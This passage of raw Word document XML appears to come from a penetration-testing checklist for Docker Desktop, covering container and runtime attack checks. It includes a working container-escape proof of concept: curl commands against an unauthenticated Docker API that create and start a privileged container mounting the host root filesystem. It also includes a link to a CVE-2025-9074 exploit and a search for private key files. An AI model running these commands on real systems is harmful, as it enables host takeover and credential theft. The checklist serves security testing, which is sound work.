        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># 3. Run Active Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA6BB2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Right-click target &gt; Attack &gt; Active Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48625A6A">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4: Container &amp; Runtime Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00336AAE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>This is where Docker Desktop introduces unique risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F904457">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Critical Checks:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3353"/>
        <w:gridCol w:w="5043"/>
      </w:tblGrid>
      <w:tr w14:paraId="08B5E286">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C9AA11C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03239FCB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Command / Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C158BCF">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44BFF5DD">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Docker API exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1347FF30">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>curl http://host.docker.internal:2375/version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E25FDCA">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71A166F4">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Privileged container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57F787EA">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>cat /proc/self/status | grep CapEff</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3070C655">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="228609CC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Writable host mounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B32A1AB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>mount | grep -E "docker.*rw"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="419CEACF">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="717580F8">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Shared namespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43E19EFB">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>ls -la /proc/self/ns/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7DB5E206">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BE8E90E">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CVE-2025-9074 (Docker Desktop Escape)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7141A077">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">Python exploit from </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/PtechAmanja/CVE-2025-9074-Docker-Desktop-Container-Escape" \t "_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>github.com/PtechAmanja</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="13"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45ACF67E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Container Escape POC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1779126C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC47A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Check if Docker API unauthenticated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8DDCA3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>curl http://192.168.65.7:2375/containers/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23565034">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414F9F73">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># If accessible - create privileged container to host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4E056">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>curl -X POST -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F09C1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">  http://192.168.65.7:2375/containers/create?name=escape \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7365E1AA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"Image":"ubuntu","Cmd":["chroot","/hostfs","/bin/bash"],"HostConfig":{"Privileged":true,"Binds":["/:/hostfs"]}}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F2B93">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8760C5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>curl -X POST http://192.168.65.7:2375/containers/escape/start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D985283">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Privilege Escalation Inside Container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A2497A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E997A6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Check user - if root, game over</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B9C57">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>whoami &amp;&amp; id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165971B3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006BAD6F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Check sudo (unlikely but possible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE920CA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339BB855">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77FB56BD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Look for sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003B83E7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>find / -name "*.key" -o -name "*.pem" -o -name "*.config" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063FF67C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EDFA40D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t># Read Docker socket if mounted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A566FE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>ls -la /var/run/docker.sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186CF0EC">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Phase 5: Configuration &amp; Secret Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26634EA0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>What to Check:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1535"/>
        <w:gridCol w:w="3688"/>
        <w:gridCol w:w="3173"/>
      </w:tblGrid>
      <w:tr w14:paraId="5ACFDCD5">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="15" w:type="dxa"/>
            <w:left w:w="15" w:type="dxa"/>
            <w:bottom w:w="15" w:type="dxa"/>
            <w:right w:w="15" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ACC0F24">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Config Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="116DA8B4">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Where to Find</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36EDC5F3">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Red Flag Example</w:t>
            </w:r>
